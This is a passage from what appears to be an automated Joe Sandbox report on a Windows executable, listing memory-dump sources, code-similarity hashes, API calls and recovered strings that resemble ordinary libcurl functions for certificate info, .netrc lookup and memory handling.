                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: ca10f7099a8e11b7cfc61e554ba5e926ab0c0bb5474b4376fd2f4e3479e7f3e1
                                            • Instruction ID: bbc7a2652be9a95880b95fb85eb4431f61a770ff01ee362783f8fafb415182b0
                                            • Opcode Fuzzy Hash: ca10f7099a8e11b7cfc61e554ba5e926ab0c0bb5474b4376fd2f4e3479e7f3e1
                                            • Instruction Fuzzy Hash: 4841D406B0D28A44FB22A711A036B79AF919F06F54F880177DA9E967C1EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: 4ce7970afd5a9239f65debad424b97acd0ba8e2cc2fc0e723198cdc55f5ca029
                                            • Instruction ID: b77c082598da73cd9c9217e5b4f725dd58fce6087e6dc3ea8170b7b72468e9af
                                            • Opcode Fuzzy Hash: 4ce7970afd5a9239f65debad424b97acd0ba8e2cc2fc0e723198cdc55f5ca029
                                            • Instruction Fuzzy Hash: D541B506B0D29A44FA62A711A036B79AFD19F06F50F880177DA9E967C5EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: 83e1fb0100f905c57ab9f068d43ff6605369474d9e078fffc21d34a0778c98eb
                                            • Instruction ID: 14381b5f2a9f530d1b43c9cf36d0bc4378c3ee88e65144d038fb140bfc0c9a47
                                            • Opcode Fuzzy Hash: 83e1fb0100f905c57ab9f068d43ff6605369474d9e078fffc21d34a0778c98eb
                                            • Instruction Fuzzy Hash: 0041D506B0D29A44FA22A711A036B79AFD19F06F50F880177DA9E967C1EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: 9d88bebb43b2fbc7647fe023011e1ba91fe3620b1f9d8eca84b5e207088da114
                                            • Instruction ID: 1de06c4f2d681911dcd89887f3d1f760c1a36ccf71a54a09381e1d6e844429e6
                                            • Opcode Fuzzy Hash: 9d88bebb43b2fbc7647fe023011e1ba91fe3620b1f9d8eca84b5e207088da114
                                            • Instruction Fuzzy Hash: 8B41D506B0D29A45FA22A711A036B79AFD19F06F50F880177DA9E967C1EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: e40c05a633061906cd65db25f240a886dccca3a985eefeb9232968f34b6f1054
                                            • Instruction ID: bb206171f22d7a833c0827afa88c913083be7233116e3fdc1bc65b42b80b5804
                                            • Opcode Fuzzy Hash: e40c05a633061906cd65db25f240a886dccca3a985eefeb9232968f34b6f1054
                                            • Instruction Fuzzy Hash: E641D606B0D29A44FA22A711A036B79AFD19F06F50F880177DE9E977C1EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: a37f3f224fc798ce1b298b1525752757f579e6cf70c552f4d4f4674165861193
                                            • Instruction ID: 1bb9d6dae5afa934e2756705372a7fae98a50f985fca14e265e090bad28b7ab7
                                            • Opcode Fuzzy Hash: a37f3f224fc798ce1b298b1525752757f579e6cf70c552f4d4f4674165861193
                                            • Instruction Fuzzy Hash: 4241C606B0D29A44FA62A711A036B79AFD19F06F50F880177DE9E977C5EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$%s%lx$Expire Date$Public Key Algorithm
                                            • API String ID: 1294909896-3155708153
                                            • Opcode ID: 0b765e0755920559e9d2752ae23419eff446ece7a23fa35f3ed63ae1d9cff77a
                                            • Instruction ID: 4dde232f633feec2e1b65d7b945a496372e8724e22f46f08023598b87eb804a5
                                            • Opcode Fuzzy Hash: 0b765e0755920559e9d2752ae23419eff446ece7a23fa35f3ed63ae1d9cff77a
                                            • Instruction Fuzzy Hash: 04415251B0969A45EA11AB659464BFDABA1BF05F8CFC44833CE4E87746DF3CE2448322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: fseek
                                            • String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                            • API String ID: 623662203-959247533
                                            • Opcode ID: 636c29a6ac46b64cd287b79ad26834ec061afeb8b3ebe0566f26f826e7c36bbb
                                            • Instruction ID: 341e84ea73e36f9262369358ad804c9cf04537ec1798f6cd932359bca29ed044
                                            • Opcode Fuzzy Hash: 636c29a6ac46b64cd287b79ad26834ec061afeb8b3ebe0566f26f826e7c36bbb
                                            • Instruction Fuzzy Hash: 0D41B461B2464942EB50BF79A4647B89791EF89F98FC81032DF0D8B289DF3DE4918721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: .
                                            • API String ID: 1865132094-916926321
                                            • Opcode ID: f91b2f7d14dfdf7098ab5232583014ba284079e117e41f318c1d2d3077799d1f
                                            • Instruction ID: 5e9f5863426ac84483846e8d50adf46868266e56d0179ef1e9bf9c3731fca82d
                                            • Opcode Fuzzy Hash: f91b2f7d14dfdf7098ab5232583014ba284079e117e41f318c1d2d3077799d1f
                                            • Instruction Fuzzy Hash: 5541E962B08BCA82E720EB11A520B7DFA90FF45F94F844132DA4D83695CF7CE4518362
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$mallocmemcpy
                                            • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                            • API String ID: 3401966785-517259162
                                            • Opcode ID: d8f8e0a4a0e375cd5f204021ae47b3fac140e17fff0a1bf2cfc304c0a5c5ad0c
                                            • Instruction ID: 2d7f97ae78f234b82fd9704e26d04b1174f2af47990ebc95fa38f6793d50896f
                                            • Opcode Fuzzy Hash: d8f8e0a4a0e375cd5f204021ae47b3fac140e17fff0a1bf2cfc304c0a5c5ad0c
                                            • Instruction Fuzzy Hash: E7418D51B0978A44EB14AB659424BBDABA2BF05FC8FC44437CE0E9B755EF3CA5048322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$freemallocmemcpy
                                            • String ID: TRUE
                                            • API String ID: 2172629687-3412697401
                                            • Opcode ID: 8ef32bb30e83b178644582b19e9688f8a4366afb6a486a2f55abccd6880cd497
                                            • Instruction ID: aa64146037e50f8b5cbb511ce3680b24b758e25571291342b6b2ca60c2ffe767
                                            • Opcode Fuzzy Hash: 8ef32bb30e83b178644582b19e9688f8a4366afb6a486a2f55abccd6880cd497
                                            • Instruction Fuzzy Hash: 6D310111F0D68A48FB22EF255124B3CEF929F55F98F840633C99E82AD5EE3C9441C322
                                            APIs
                                              • Part of subcall function 00007FF7E5A1BF40: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A004B9,?,?,?,?,00007FF7E59FF85B), ref: 00007FF7E5A1BF68
                                              • Part of subcall function 00007FF7E5A1BF40: GetEnvironmentVariableA.KERNEL32(?,?,?,00007FF7E5A004B9,?,?,?,?,00007FF7E59FF85B), ref: 00007FF7E5A1BF8E
                                              • Part of subcall function 00007FF7E5A1BF40: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A004B9,?,?,?,?,00007FF7E59FF85B), ref: 00007FF7E5A1BFAF
                                              • Part of subcall function 00007FF7E5A1BF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A004B9,?,?,?,?,00007FF7E59FF85B), ref: 00007FF7E5A1BFC0
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A304CF
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A30518
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A30521
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$realloc$EnvironmentVariable
                                            • String ID: %s%s.netrc$%s%s_netrc$HOME
                                            • API String ID: 4174189579-3384076093
                                            • Opcode ID: ce33ce03b15b08335ee075b48f2ac132f7423bfbe585d713eb93ca792406d6ff
                                            • Instruction ID: ba45a359e100df6c58833019ff36bc883d251abd6ad665cf13359453ff88cf36
                                            • Opcode Fuzzy Hash: ce33ce03b15b08335ee075b48f2ac132f7423bfbe585d713eb93ca792406d6ff
                                            • Instruction Fuzzy Hash: 5C319721B09B4AC1EA10EB16BC20A6AEA90BF44FD8FD44133ED8D87755EF3CE5458721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: Start Date: %s$FALSE$Start Date$TRUE
                                            • API String ID: 1865132094-176635895
                                            • Opcode ID: 1f487dde392c3a3120692d44dd57c5843b08388db113ca8ef60605f3459bfef1
                                            • Instruction ID: b48b1448ed26d64050a373213bd9bb8bec924c5a7b26226ac326d35dee60faa6
                                            • Opcode Fuzzy Hash: 1f487dde392c3a3120692d44dd57c5843b08388db113ca8ef60605f3459bfef1
                                            • Instruction Fuzzy Hash: 1B21A152B096CA85EB25AB24A464BB9AB51BF05F88FC44433CA4D87755CF3CE184C322
                                            APIs
                                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A05675
                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A056A1
                                            • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A056A9
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A056CB
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A056E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_errnostrerrorstrtoul
                                            • String ID: Invalid zoneid: %s; %s
                                            • API String ID: 439826447-2159854051
                                            • Opcode ID: c0c8fcb44667ca2c8fe23aa92df2b9262a7bcb97f9c91f97d65f5fb040fd2184
                                            • Instruction ID: 186919e530daf9cdad5e83349fd5fcc43d8bcf1f72e03c68db7d614cf3630490
                                            • Opcode Fuzzy Hash: c0c8fcb44667ca2c8fe23aa92df2b9262a7bcb97f9c91f97d65f5fb040fd2184
                                            • Instruction Fuzzy Hash: 63118931B1954A82EB00FB61E464B79AB60EF85F48F980433DA0D87654DF3DD444CB22
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A05584
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0559A
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055AE
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055C2
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055D6
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055EA
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055FE
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A05612
                                              • Part of subcall function 00007FF7E5A2E510: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2E525
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 8c11188c648886522ce8a6e64f6b6562302f20e8865ed9cfa606d4a8050b4ce4
                                            • Instruction ID: 4bd00aa9744cea50f3af6822aec58bd3f42e71a36a6640b9d2897927f8315dd2
                                            • Opcode Fuzzy Hash: 8c11188c648886522ce8a6e64f6b6562302f20e8865ed9cfa606d4a8050b4ce4
                                            • Instruction Fuzzy Hash: 5E115636608F85C1D7009F21FDA55E877A4FBC9F9AB980136DE4F8F6549F3490958221
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF061
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF071
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF07F
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF08D
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF09B
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF0A9
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF0B7
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A02856), ref: 00007FF7E59FF0C5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 8c00d13d1d1400f5b02d6f8230e4e97fdd4fc61512994be1568aed62c2dc6e4e
                                            • Instruction ID: d14fcfe8c4f397accf3b0eb4aaec58003c90c5bc7efcaf209cb4d9178614806d
                                            • Opcode Fuzzy Hash: 8c00d13d1d1400f5b02d6f8230e4e97fdd4fc61512994be1568aed62c2dc6e4e
                                            • Instruction Fuzzy Hash: 45015936608B06C2D714AF21F99593C77B4FF89F997A15126CE8E82718CF38D499C351
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 76e9e92d93f0c8c719248e6433bf710fa477ed7a141f7287600a96dac61d5d71
                                            • Instruction ID: 741171aeea2c81edf49a95581675873fb2f40e7291a968ba9c4d283f6d298d26
                                            • Opcode Fuzzy Hash: 76e9e92d93f0c8c719248e6433bf710fa477ed7a141f7287600a96dac61d5d71
                                            • Instruction Fuzzy Hash: 9BF0A966B1490AC2D714AF66FC669386730FF98F55BA41032CD5F86364CE3CD899C351
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcmpmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                            • String ID:
                                            • API String ID: 2846809682-0
                                            • Opcode ID: 69c2e6193ddaa38194f47971ac0935eb94a2df83c2e04eaa05abd7d51751e23c
                                            • Instruction ID: e42e98927c0bf3a541dd76c4e59ea1df4c82812aa901d99169ebe29d311c20ae
                                            • Opcode Fuzzy Hash: 69c2e6193ddaa38194f47971ac0935eb94a2df83c2e04eaa05abd7d51751e23c
                                            • Instruction Fuzzy Hash: 1FA1F222718A8982EA10EF25E4543A9A7A0FB48FD4F984536DFAD877C5DF3CE091C311
                                            APIs
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7E5A0299B), ref: 00007FF7E5A02137
